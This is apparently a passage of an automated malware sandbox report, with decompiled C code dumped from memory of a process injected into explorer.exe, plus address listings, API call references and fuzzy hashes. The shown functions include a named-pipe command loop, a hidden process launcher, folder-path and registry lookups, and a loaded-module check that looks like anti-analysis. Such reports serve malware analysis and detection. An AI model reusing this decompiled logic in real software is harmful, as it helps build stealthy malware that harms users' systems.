									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
									_t249 = E00088604(0x1000);
									_v624 = _t249;
									_pop(_t278);
									__eflags = _t249;
									if(_t249 != 0) {
										_t220 = E000895E1(_t278, 0x32d);
										_t280 =  *0x9e688; // 0xb0000
										_push(_t280 + 0x228);
										_t282 = 0x3c;
										_v636 = _t220;
										_push(_v628 % _t282 & 0x0000ffff);
										E00089640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
										E000885D5( &_v636);
										E0008A911(_t249, 0, 0xbb8, 1);
										E0008861A( &_v624, 0xfffffffe);
									}
									goto L41;
								}
							}
						} else {
							_t238 =  *((intOrPtr*)(_t262 + 0x214));
							__eflags = _t238 - _t246;
							if(_t238 == _t246) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
								L36:
								_t144 = E000895E1(_t262, 0x610);
								_push(0);
								_push(_t144);
								_v616 = _t144;
								_t145 =  *0x9e688; // 0xb0000
								_t329 = E000892E5(_t145 + 0x228);
								_v612 = _t329;
								__eflags = _t329;
								if(_t329 != 0) {
									_t160 = E0008B269(_t329);
									__eflags = _t160;
									if(_t160 != 0) {
										_t163 =  *0x9e684; // 0xe7f8f0
										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
									}
									E0008861A( &_v612, 0xfffffffe);
								}
								E000885D5( &_v616);
								_t150 =  *0x9e688; // 0xb0000
								lstrcpynW(_t150 + 0x438,  *0x9e740, 0x105);
								_t153 =  *0x9e688; // 0xb0000
								_t154 = _t153 + 0x228;
								__eflags = _t154;
								lstrcpynW(_t154,  *0x9e738, 0x105);
								_t331 =  *0x9e688; // 0xb0000
								_t117 = _t331 + 0x228; // 0xb0228
								 *((intOrPtr*)(_t331 + 0x434)) = E00088FBE(_t117, __eflags);
								E0008861A(0x9e740, 0xfffffffe);
								E0008861A(0x9e738, 0xfffffffe);
								L41:
								_t159 = 0;
								__eflags = 0;
								L42:
								return _t159;
							}
							__eflags = _t238 - 2;
							if(_t238 != 2) {
								goto L36;
							}
							goto L17;
						}
					}
					L8:
					_t159 = _t122 | 0xffffffff;
					goto L42;
				}
				_t250 = E000895C7(0x6e2);
				_v616 = _t250;
				_t326 = E000895C7(0x9f5);
				_v612 = _t326;
				if(_t250 != 0 && _t326 != 0) {
					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
						_v620 = 1;
					}
					E000885C2( &_v616);
					_t122 = E000885C2( &_v612);
					_t351 = _v620;
					if(_v620 != 0) {
						goto L8;
					}
				}
			}




















































































                  0x00084d6d
                  0x00084d73
                  0x00084d79
                  0x00084d7e
                  0x00084d8c
                  0x00084d8f
                  0x00084dee
                  0x00084df7
                  0x00084e00
                  0x00084e03
                  0x00084e0a
                  0x00084e0f
                  0x00084e14
                  0x00084e1b
                  0x00084e25
                  0x00084e2c
                  0x00084e32
                  0x00084e37
                  0x00084e3c
                  0x00084e43
                  0x00084e49
                  0x00084e4b
                  0x00084e4c
                  0x00084e50
                  0x00084e5b
                  0x00084e60
                  0x00084e69
                  0x00084e6e
                  0x00084e76
                  0x00084e7d
                  0x00084e7e
                  0x00084e80
                  0x00084e9c
                  0x00084e9f
                  0x00084e9f
                  0x00084ea8
                  0x00084ead
                  0x00084ebd
                  0x00084ec5
                  0x00084eca
                  0x00084ed0
                  0x00084ed3
                  0x00084ed9
                  0x00084ef8
                  0x00084efe
                  0x00084eff
                  0x00084f00
                  0x00084f01
                  0x00084f02
                  0x00084f03
                  0x00084f0d
                  0x00084f11
                  0x00084f16
                  0x00084f19
                  0x00084f1b
                  0x00084f2d
                  0x00084f2d
                  0x00084f2f
                  0x00084f3b
                  0x00084f40
                  0x00084f46
                  0x00084f4f
                  0x00084f52
                  0x00084f54
                  0x00084f5f
                  0x00084f64
                  0x00084f69
                  0x00084f6e
                  0x00084f6e
                  0x00084f71
                  0x00084f78
                  0x00000000
                  0x00084f7e
                  0x00084f7e
                  0x00084f83
                  0x00084f87
                  0x00084f89
                  0x00084f8c
                  0x00084f8e
                  0x00084f94
                  0x00084f94
                  0x00084f8e
                  0x00084f96
                  0x00084f9b
                  0x00084fa1
                  0x00084fa3
                  0x00000000
                  0x00084fa9
                  0x00084fa9
                  0x00084fad
                  0x00085082
                  0x00085088
                  0x0008508e
                  0x00085099
                  0x0008509a
                  0x0008509b
                  0x0008509c
                  0x000850a2
                  0x000850a7
                  0x000850ad
                  0x000850b5
                  0x000850bb
                  0x000850be
                  0x000850cd
                  0x000850d4
                  0x000850d7
                  0x000850e4
                  0x000850e8
                  0x000850f5
                  0x000850fa
                  0x000850fd
                  0x000850ff
                  0x00085110
                  0x00085112
                  0x00085116
                  0x00085117
                  0x00085119
                  0x00085124
                  0x00085129
                  0x00085136
                  0x0008513a
                  0x0008513b
                  0x0008513d
                  0x00085145
                  0x00085146
                  0x0008514b
                  0x00085163
                  0x00085168
                  0x0008516b
                  0x0008516f
                  0x00085171
                  0x00085184
                  0x0008518e
                  0x00085192
                  0x0008519a
                  0x0008519b
                  0x000851a3
                  0x000851a4
                  0x000851a9
                  0x000851b5
                  0x000851bf
                  0x000851d1
                  0x000851dd
                  0x000851e2
                  0x000851e2
                  0x000851ec
                  0x000851f2
                  0x000851f2
                  0x00085119
                  0x000850ff
                  0x00000000
                  0x00085088
                  0x00084fb3
                  0x00084fb6
                  0x00000000
                  0x00000000
                  0x00084fbc
                  0x00084fc7
                  0x00084fc8
                  0x00084fc9
                  0x00084fca
                  0x00084fd0
                  0x00084fd5
                  0x00084fe9
                  0x00084fee
                  0x00084ff2
                  0x00084ffd
                  0x00085006
                  0x00085008
                  0x0008500c
                  0x0008500d
                  0x0008500f
                  0x0008501a
                  0x00085020
                  0x00085032
                  0x00085035
                  0x00085038
                  0x00085045
                  0x0008504d
                  0x00085057
                  0x00085069
                  0x00085075
                  0x0008507a
                  0x00000000
                  0x0008500f
                  0x00084fa3
                  0x00084edb
                  0x00084edb
                  0x00084ee1
                  0x00084ee3
                  0x00000000
                  0x00000000
                  0x00084ee5
                  0x00084ee9
                  0x000851f3
                  0x000851f8
                  0x000851fe
                  0x00085200
                  0x00085201
                  0x00085205
                  0x00085215
                  0x0008521a
                  0x0008521e
                  0x00085220
                  0x00085224
                  0x00085229
                  0x0008522b
                  0x0008522d
                  0x00085233
                  0x00085233
                  0x00085240
                  0x00085246
                  0x0008524c
                  0x00085251
                  0x0008526f
                  0x00085271
                  0x0008527d
                  0x0008527d
                  0x00085283
                  0x00085285
                  0x0008528b
                  0x0008529d
                  0x000852a3
                  0x000852af
                  0x000852b7
                  0x000852b7
                  0x000852b7
                  0x000852b9
                  0x000852bf
                  0x000852bf
                  0x00084eef
                  0x00084ef2
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00084ef2
                  0x00084ed9
                  0x00084e1d
                  0x00084e1d
                  0x00000000
                  0x00084e1d
                  0x00084d9b
                  0x00084da2
                  0x00084dab
                  0x00084dad
                  0x00084db3
                  0x00084dc4
                  0x00084dcd
                  0x00084dcd
                  0x00084dd9
                  0x00084de2
                  0x00084de7
                  0x00084dec
                  0x00000000
                  0x00000000
                  0x00084dec

                  APIs
                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00084DC0
                  • GetModuleHandleA.KERNEL32(00000000), ref: 00084DC7
                  • lstrcpynW.KERNEL32(000AFBC8,00000105), ref: 0008526F
                  • lstrcpynW.KERNEL32(000AFDD8,00000105), ref: 00085283
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: HandleModulelstrcpyn
                  • String ID:
                  • API String ID: 3430401031-0
                  • Opcode ID: fe4587f6266c6efdfab110eb6b801ba6b71310a9b5c534e9137ca171d8ead72b
                  • Instruction ID: 161cbc9eeedcce8db67ccaa0b8f26abb365355608c06558398d668d8ddb63534
                  • Opcode Fuzzy Hash: fe4587f6266c6efdfab110eb6b801ba6b71310a9b5c534e9137ca171d8ead72b
                  • Instruction Fuzzy Hash: 64E1AE71608341AFE750FF64DC86FAA73E9BB98314F04092AF584DB2D2EB74D9448B52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 000832A1, Relevance: 6.2, APIs: 4, Instructions: 189pipeCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 350 832a1-832b4 351 832b7-832ce ConnectNamedPipe 350->351 352 832d0-832db GetLastError 351->352 353 832e1-83304 351->353 352->353 354 834c2-834c8 352->354 356 834a8 GetLastError 353->356 357 8330a-8330e 353->357 358 834ae-834bc DisconnectNamedPipe 356->358 357->356 359 83314-83320 357->359 358->351 358->354 360 833b8-833d1 call 893be 359->360 361 83326-83329 359->361 370 83476-8349b call 896ca 360->370 371 833d7-833dd 360->371 363 8332b-8332f 361->363 364 83397-833b3 call 8c319 361->364 367 8337b-83384 call 8f79f 363->367 368 83331-83334 363->368 364->358 387 83358-8335b 367->387 373 83365-83369 call 8f79f 368->373 374 83336-83339 368->374 389 8349d-834a6 call 8c319 370->389 376 833df-833f6 call 88604 371->376 377 83454-8346f call 89749 call 81da0 371->377 385 8336e-83376 373->385 380 8333b-8333e 374->380 381 8334f-83353 call 8f7c1 374->381 398 833f8-833fd 376->398 399 83471 376->399 377->370 380->358 388 83344-8334d call 8f7c1 380->388 381->387 385->389 390 8335d-83363 387->390 391 83386-83388 387->391 388->385 389->358 397 8338a-83392 call 8c319 390->397 391->397 397->358 402 8342a-83452 call 89749 call 81da0 call 894b7 398->402 403 833ff-83402 398->403 406 83473 399->406 402->406 408 83404-83425 call 8c379 call 891a6 403->408 406->370 418 83427 408->418 418->402
                  C-Code - Quality: 54%
                  			E000832A1() {
				char _v8;
				struct _OVERLAPPED* _v12;
				struct _OVERLAPPED* _v16;
				intOrPtr* _v20;
				char _v24;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr* _v40;
				char _v168;
				char _v172;
				intOrPtr _t41;
				void* _t47;
				char _t54;
				char _t61;
				intOrPtr _t64;
				void* _t65;
				void* _t68;
				void* _t70;
				void* _t72;
				void* _t76;
				struct _OVERLAPPED* _t82;
				intOrPtr* _t83;
				signed int _t84;
				signed short* _t86;
				intOrPtr* _t97;
				signed short* _t105;
				void* _t107;
				void* _t108;
				void* _t109;
				intOrPtr* _t112;
				struct _OVERLAPPED* _t113;
				char _t114;
				void* _t115;

				_t113 = 0;
				_t82 = 0;
				_v8 = 0;
				_v12 = 0;
				while(1) {
					_v16 = _t113;
					if(ConnectNamedPipe( *0x9e674, _t113) == 0 && GetLastError() != 0x217) {
						break;
					}
					_push(_t113);
					_push( &_v16);
					_t41 =  *0x9e684; // 0xe7f8f0
					_push(0x80000);
					_push( *0x9e724);
					_push( *0x9e674);
					if( *((intOrPtr*)(_t41 + 0x88))() == 0 || _v16 == 0) {
						GetLastError();
					} else {
						_t86 =  *0x9e724; // 0x2c20020
						_t47 = ( *_t86 & 0x0000ffff) - 1;
						if(_t47 == 0) {
							_t112 = E000893BE( &(_t86[4]), 0x20, 1,  &_v24);
							_v40 = _t112;
							if(_t112 != 0) {
								_t114 = _v24;
								if(_t114 <= 1) {
									_t113 = 0;
									_t54 = E00081DA0(E00089749( *_t112), 0, 0, 0);
									_t115 = _t115 + 0x10;
									_v172 = _t54;
								} else {
									_v36 = _t114 - 1;
									_t83 = E00088604(_t114 - 1 << 2);
									_v32 = _t83;
									if(_t83 == 0) {
										_t113 = 0;
									} else {
										if(_t114 > 1) {
											_v20 = _t83;
											_t84 = 1;
											do {
												_t64 = E000891A6( *((intOrPtr*)(_t112 + _t84 * 4)), E0008C379( *((intOrPtr*)(_t112 + _t84 * 4))));
												_t97 = _v20;
												_t84 = _t84 + 1;
												 *_t97 = _t64;
												_v20 = _t97 + 4;
											} while (_t84 < _t114);
											_t83 = _v32;
										}
										_t113 = 0;
										_t61 = E00081DA0(E00089749( *_t112), _t83, _v36, 0);
										_t115 = _t115 + 0x10;
										_v172 = _t61;
										E000894B7( &_v24);
									}
									_t82 = _v12;
								}
							}
							_t105 =  *0x9e724; // 0x2c20020
							E000896CA( &_v168,  &(_t105[4]), 0x80);
							_push(0x84);
							_push( &_v172);
							_push(2);
							goto L33;
						} else {
							_t65 = _t47 - 3;
							if(_t65 == 0) {
								_push(_t113);
								_push(_t113);
								_t108 = 5;
								E0008C319(_t108);
								 *0x9e758 = 1;
								_t82 = 1;
								_v12 = 1;
							} else {
								_t68 = _t65;
								if(_t68 == 0) {
									_t70 = E0008F79F( &_v8);
									goto L13;
								} else {
									_t72 = _t68 - 1;
									if(_t72 == 0) {
										E0008F79F( &_v8);
										goto L16;
									} else {
										_t76 = _t72 - 1;
										if(_t76 == 0) {
											_t70 = E0008F7C1( &_v8);
											L13:
											if(_t70 == 0) {
												_push(_t113);
												_push(_t113);
												_push(0xa);
											} else {
												_push(_v8);
												_push(_t70);
												_push(5);
											}
											_pop(_t109);
											E0008C319(_t109);
										} else {
											if(_t76 == 1) {
												E0008F7C1( &_v8);
												L16:
												_push(4);
												_push( &_v8);
												_push(5);
												L33:
												_pop(_t107);
												E0008C319(_t107);
												_t115 = _t115 + 0xc;
											}
										}
									}
								}
							}
						}
					}
					DisconnectNamedPipe( *0x9e674);
					if(_t82 == 0) {
						continue;
					}
					break;
				}
				return 0;
			}




































                  0x000832ac
                  0x000832ae
                  0x000832b0
                  0x000832b4
                  0x000832b7
                  0x000832c3
                  0x000832ce
                  0x00000000
                  0x00000000
                  0x000832e1
                  0x000832e5
                  0x000832e6
                  0x000832eb
                  0x000832f0
                  0x000832f6
                  0x00083304
                  0x000834a8
                  0x00083314
                  0x00083314
                  0x0008331d
                  0x00083320
                  0x000833c8
                  0x000833ca
                  0x000833d1
                  0x000833d7
                  0x000833dd
                  0x00083456
                  0x00083461
                  0x00083466
                  0x00083469
                  0x000833df
                  0x000833e2
                  0x000833ee
                  0x000833f0
                  0x000833f6
                  0x00083471
                  0x000833f8
                  0x000833fd
                  0x000833ff
                  0x00083402
                  0x00083404
                  0x00083412
                  0x00083417
                  0x0008341a
                  0x0008341b
                  0x00083420
                  0x00083423
                  0x00083427
                  0x00083427
                  0x0008342c
                  0x00083439
                  0x0008343e
                  0x00083441
                  0x0008344d
                  0x0008344d
                  0x00083473
                  0x00083473
                  0x000833dd
                  0x00083476
                  0x0008348a
                  0x0008348f
                  0x0008349a
                  0x0008349b
                  0x00000000
                  0x00083326
                  0x00083326
                  0x00083329
                  0x00083397
                  0x00083398
                  0x0008339b
                  0x0008339c
                  0x000833a3
                  0x000833ae
                  0x000833b0
                  0x0008332b
                  0x0008332c
                  0x0008332f
                  0x0008337f
                  0x00000000
                  0x00083331
                  0x00083331
                  0x00083334
                  0x00083369
                  0x00000000
                  0x00083336
                  0x00083336
                  0x00083339
                  0x00083353
                  0x00083358
                  0x0008335b
                  0x00083386
                  0x00083387
                  0x00083388
                  0x0008335d
                  0x0008335d
                  0x00083360
                  0x00083361
                  0x00083361
                  0x0008338a
                  0x0008338b
                  0x0008333b
                  0x0008333e
                  0x00083348
                  0x0008336e
                  0x0008336e
                  0x00083373
                  0x00083374
                  0x0008349d
                  0x0008349d
                  0x0008349e
                  0x000834a3
                  0x000834a3
                  0x0008333e
                  0x00083339
                  0x00083334
                  0x0008332f
                  0x00083329
                  0x00083320
                  0x000834b4
                  0x000834bc
                  0x00000000
                  0x00000000
                  0x00000000
                  0x000834bc
                  0x000834c8

                  APIs
                  • ConnectNamedPipe.KERNELBASE(00000000), ref: 000832C6
                  • GetLastError.KERNEL32 ref: 000832D0
                    • Part of subcall function 0008C319: FlushFileBuffers.KERNEL32(00000210), ref: 0008C35F
                  • DisconnectNamedPipe.KERNEL32 ref: 000834B4
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: NamedPipe$BuffersConnectDisconnectErrorFileFlushLast
                  • String ID:
                  • API String ID: 2389948835-0
                  • Opcode ID: be6ae701c2cd6f96a3c21335c1a9f6642868689993e908009eddb05f95c01e46
                  • Instruction ID: aec34d1c461da35ce7ea10a51bd790cfc71f6dd0dd97058cb51a1121444265f8
                  • Opcode Fuzzy Hash: be6ae701c2cd6f96a3c21335c1a9f6642868689993e908009eddb05f95c01e46
                  • Instruction Fuzzy Hash: 4151E472A00215ABEB61FFA4DC89AEEBBB8FF45750F104026F584A6151DB749B44CB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008A911, Relevance: 6.1, APIs: 4, Instructions: 74processCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 420 8a911-8a941 memset 421 8a94c-8a971 CreateProcessW 420->421 422 8a943-8a948 420->422 423 8a9ae 421->423 424 8a973-8a976 421->424 422->421 427 8a9b0-8a9b6 423->427 425 8a978-8a988 424->425 426 8a996-8a9a6 CloseHandle 424->426 425->426 430 8a98a-8a990 GetExitCodeProcess 425->430 429 8a9ac 426->429 429->427 430->426
                  C-Code - Quality: 65%
                  			E0008A911(WCHAR* _a4, DWORD* _a8, intOrPtr _a12, signed int _a16) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v92;
				signed int _t24;
				intOrPtr _t32;
				intOrPtr _t34;
				int _t42;
				WCHAR* _t44;

				_t42 = 0x44;
				memset( &_v92, 0, _t42);
				_v92.cb = _t42;
				asm("stosd");
				_t44 = 1;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 = _a16;
				if(_t24 != 0) {
					_v92.dwFlags = 1;
					_v92.wShowWindow = 0;
				}
				asm("sbb eax, eax");
				if(CreateProcessW(0, _a4, 0, 0, 0,  ~_t24 & 0x08000000, 0, 0,  &_v92,  &_v20) == 0) {
					_t44 = 0;
				} else {
					if(_a8 != 0) {
						_push(_a12);
						_t34 =  *0x9e684; // 0xe7f8f0
						_push(_v20.hProcess);
						if( *((intOrPtr*)(_t34 + 0x2c))() >= 0) {
							GetExitCodeProcess(_v20.hProcess, _a8);
						}
					}
					CloseHandle(_v20.hThread);
					_t32 =  *0x9e684; // 0xe7f8f0
					 *((intOrPtr*)(_t32 + 0x30))(_v20);
				}
				return _t44;
			}










                  0x0008a91c
                  0x0008a925
                  0x0008a92c
                  0x0008a934
                  0x0008a938
                  0x0008a939
                  0x0008a93a
                  0x0008a93b
                  0x0008a93c
                  0x0008a941
                  0x0008a945
                  0x0008a948
                  0x0008a948
                  0x0008a955
                  0x0008a971
                  0x0008a9ae
                  0x0008a973
                  0x0008a976
                  0x0008a978
                  0x0008a97b
                  0x0008a980
                  0x0008a988
                  0x0008a990
                  0x0008a990
                  0x0008a988
                  0x0008a99e
                  0x0008a9a1
                  0x0008a9a9
                  0x0008a9a9
                  0x0008a9b6

                  APIs
                  • memset.MSVCRT ref: 0008A925
                  • CreateProcessW.KERNEL32(00000000,00001388,00000000,00000000,00000000,0008C1AB,00000000,00000000,?,00000000,00000000,00000000,00000001), ref: 0008A96C
                  • GetExitCodeProcess.KERNEL32(00000000,?), ref: 0008A990
                  • CloseHandle.KERNELBASE(?), ref: 0008A99E
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Process$CloseCodeCreateExitHandlememset
                  • String ID:
                  • API String ID: 2668540068-0
                  • Opcode ID: 225cfbb69293b3eed798390d4c55be612c5650c273af84687da85cfb64abf4ec
                  • Instruction ID: 69c2d589c2e0a2c9629c015d340a78d4e10d2ecd89ef4d1a65b39d481363986c
                  • Opcode Fuzzy Hash: 225cfbb69293b3eed798390d4c55be612c5650c273af84687da85cfb64abf4ec
                  • Instruction Fuzzy Hash: C0215C72A00118BFEF519FA9DC84EAFBBBCFF08380B014426FA55E6560D6349C00CB62
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008B012, Relevance: 6.1, APIs: 4, Instructions: 72stringCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 431 8b012-8b079 memset * 2 SHGetFolderPathW call 8b946 434 8b07c-8b07e 431->434 435 8b0ab-8b0dd call 8c392 lstrcpynW 434->435 436 8b080-8b094 call 8bb8d 434->436 436->435 440 8b096-8b0a7 436->440 440->435
                  C-Code - Quality: 87%
                  			E0008B012(void* __ecx, WCHAR* __edx) {
				int _v8;
				void _v528;
				char _v1046;
				void _v1048;
				intOrPtr _t21;
				intOrPtr* _t26;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t36;
				void* _t39;
				intOrPtr _t40;
				WCHAR* _t47;
				void* _t49;

				_t39 = __ecx;
				_v8 = 0x104;
				_t47 = __edx;
				memset( &_v1048, 0, 0x208);
				memset( &_v528, 0, 0x208);
				_t21 =  *0x9e698; // 0xe7fbc8
				 *((intOrPtr*)(_t21 + 4))(0, 0x1a, 0, 1,  &_v1048);
				_t49 = E0008B946(_t39);
				_t26 =  *0x9e6b8; // 0xe7fbd8
				_t27 =  *_t26(_t49,  &_v528,  &_v8); // executed
				if(_t27 == 0) {
					_t33 =  *0x9e688; // 0xb0000
					if(E0008BB8D( *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x110))))) != 0) {
						_t36 =  *0x9e698; // 0xe7fbc8
						 *((intOrPtr*)(_t36 + 4))(0, 0x24, 0, 1,  &_v528);
					}
				}
				_t40 =  *0x9e684; // 0xe7f8f0
				 *((intOrPtr*)(_t40 + 0x30))(_t49);
				lstrcpynW(_t47,  &_v1046 + E0008C392( &_v528) * 2, 0x104);
				return 1;
			}
















                  0x0008b012
                  0x0008b023
                  0x0008b035
                  0x0008b037
                  0x0008b045
                  0x0008b054
                  0x0008b05f
                  0x0008b067
                  0x0008b074
                  0x0008b07a
                  0x0008b07e
                  0x0008b080
                  0x0008b094
                  0x0008b09d
                  0x0008b0a8
                  0x0008b0a8
                  0x0008b094
                  0x0008b0ab
                  0x0008b0b2
                  0x0008b0d0
                  0x0008b0dd

                  APIs
                  • memset.MSVCRT ref: 0008B037
                  • memset.MSVCRT ref: 0008B045
                  • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000001,?,?,?,?,?,?,00000000), ref: 0008B05F
                    • Part of subcall function 0008B946: GetCurrentThread.KERNEL32(00000008,00000000,10000000,00000000,?,?,0008BA7C,74EC17D9,10000000), ref: 0008B959
                    • Part of subcall function 0008B946: GetLastError.KERNEL32(?,?,0008BA7C,74EC17D9,10000000), ref: 0008B967
                    • Part of subcall function 0008B946: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,0008BA7C,74EC17D9,10000000), ref: 0008B980
                  • lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,00000000), ref: 0008B0D0
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Currentmemset$ErrorFolderLastPathProcessThreadlstrcpyn
                  • String ID:
                  • API String ID: 3158470084-0
                  • Opcode ID: 3309cad5030584fc54aa8f49d31479e0ce1f2041df6bd5106adfde4e1a117ce7
                  • Instruction ID: 19c7f563789c793ddff4382733eb78b8a69f152fd9c3ce08f6bae5569c2b2d08
                  • Opcode Fuzzy Hash: 3309cad5030584fc54aa8f49d31479e0ce1f2041df6bd5106adfde4e1a117ce7
                  • Instruction Fuzzy Hash: FA218EB2501218BFE710EBA4DCC9EDB77BCBB49354F1040A5F20AD7192EB749E458B60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008BF37, Relevance: 6.1, APIs: 4, Instructions: 72registryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 443 8bf37-8bf66 RegOpenKeyExW 444 8bf68-8bf6a 443->444 445 8bf6c-8bf8a RegQueryValueExW 443->445 446 8bfda-8bfdc 444->446 447 8bf8c-8bf9c call 88604 445->447 448 8bfc7-8bfca 445->448 447->448 454 8bf9e-8bfb8 RegQueryValueExW 447->454 449 8bfcc-8bfd1 448->449 450 8bfd7 448->450 449->450 452 8bfd9 450->452 452->446 455 8bfba-8bfc6 call 8861a 454->455 456 8bfdd-8bfea RegCloseKey 454->456 455->448 456->452
                  C-Code - Quality: 100%
                  			E0008BF37(short* __edx, short* _a4) {
				void* _v8;
				int _v12;
				int _v16;
				char* _v20;
				char* _t30;
				intOrPtr _t31;
				char* _t49;

				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(RegOpenKeyExW(0x80000002, __edx, 0, 0x20019,  &_v8) == 0) {
					if(RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12) != 0) {
						L6:
						if(_v8 != 0) {
							_t31 =  *0x9e68c; // 0xe7fab8
							 *((intOrPtr*)(_t31 + 0x1c))(_v8);
						}
						_t30 = 0;
						L9:
						return _t30;
					}
					_t49 = E00088604(_v12);
					_v20 = _t49;
					if(_t49 == 0) {
						goto L6;
					}
					if(RegQueryValueExW(_v8, _a4, 0, 0, _t49,  &_v12) == 0) {
						RegCloseKey(_v8);
						_t30 = _t49;
						goto L9;
					}
					E0008861A( &_v20, 0xfffffffe);
					goto L6;
				}
				return 0;
			}










                  0x0008bf55
                  0x0008bf58
                  0x0008bf5b
                  0x0008bf66
                  0x0008bf8a
                  0x0008bfc7
                  0x0008bfca
                  0x0008bfcc
                  0x0008bfd4
                  0x0008bfd4
                  0x0008bfd7
                  0x0008bfd9
                  0x00000000
                  0x0008bfd9
                  0x0008bf94
                  0x0008bf96
                  0x0008bf9c
                  0x00000000
                  0x00000000
                  0x0008bfb8
                  0x0008bfe5
                  0x0008bfe8
                  0x00000000
                  0x0008bfe8
                  0x0008bfc0
                  0x00000000
                  0x0008bfc6
                  0x00000000

                  APIs
                  • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,00000000,00000000,?,?,00082C08,00000000), ref: 0008BF5E
                  • RegQueryValueExW.KERNEL32(00000000,00082C08,00000000,?,00000000,00082C08,00000000,?,?,00082C08,00000000), ref: 0008BF82
                  • RegQueryValueExW.KERNEL32(00000000,00082C08,00000000,00000000,00000000,00082C08,?,?,00082C08,00000000), ref: 0008BFB0
                  • RegCloseKey.KERNEL32(00000000,?,?,00082C08,00000000,?,?,?,?,?,?,?,000000AF,?), ref: 0008BFE5
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: QueryValue$CloseOpen
                  • String ID:
                  • API String ID: 1586453840-0
                  • Opcode ID: eb045fb9aa9dc7280153c8fb7aa9239c4f3b61ea42fdf97ace11c877361682ae
                  • Instruction ID: 30ccd786ff8b7b84f14da17d4d39020c4d4bce544ae74224a6a2efcb0f455484
                  • Opcode Fuzzy Hash: eb045fb9aa9dc7280153c8fb7aa9239c4f3b61ea42fdf97ace11c877361682ae
                  • Instruction Fuzzy Hash: 3121E8B6900118FFDB50EBA9DC48E9EBBF8FF88750B1541AAF645E6162D7309A00DB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008BE9B, Relevance: 6.1, APIs: 4, Instructions: 69registryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 459 8be9b-8bec3 RegOpenKeyExA 460 8bec9-8bee6 RegQueryValueExA 459->460 461 8bec5-8bec7 459->461 463 8bee8-8bef7 call 88604 460->463 464 8bf21-8bf24 460->464 462 8bf33-8bf36 461->462 463->464 469 8bef9-8bf13 RegQueryValueExA 463->469 466 8bf31 464->466 467 8bf26-8bf2e RegCloseKey 464->467 466->462 467->466 469->464 470 8bf15-8bf1a 469->470 470->464 471 8bf1c-8bf1f 470->471 471->464
                  C-Code - Quality: 100%
                  			E0008BE9B(void* __ecx, char* __edx, char* _a4, intOrPtr* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				intOrPtr* _t43;
				char* _t46;

				_t46 = 0;
				_v8 = 0;
				_v16 = 0;
				if(RegOpenKeyExA(__ecx, __edx, 0, 0x20019,  &_v8) != 0) {
					return 0;
				}
				_v12 = 0;
				if(RegQueryValueExA(_v8, _a4, 0,  &_v16, 0,  &_v12) == 0) {
					_t46 = E00088604(_v12 + 1);
					if(_t46 != 0 && RegQueryValueExA(_v8, _a4, 0,  &_v16, _t46,  &_v12) == 0) {
						_t43 = _a12;
						if(_t43 != 0) {
							 *_t43 = _v12;
						}
					}
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				return _t46;
			}








                  0x0008beae
                  0x0008beb8
                  0x0008bebb
                  0x0008bec3
                  0x00000000
                  0x0008bec5
                  0x0008becc
                  0x0008bee6
                  0x0008bef2
                  0x0008bef7
                  0x0008bf15
                  0x0008bf1a
                  0x0008bf1f
                  0x0008bf1f
                  0x0008bf1a
                  0x0008bef7
                  0x0008bf24
                  0x0008bf2e
                  0x0008bf2e
                  0x00000000

                  APIs
                  • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,00E7FC18,00000000,?,00000002), ref: 0008BEBE
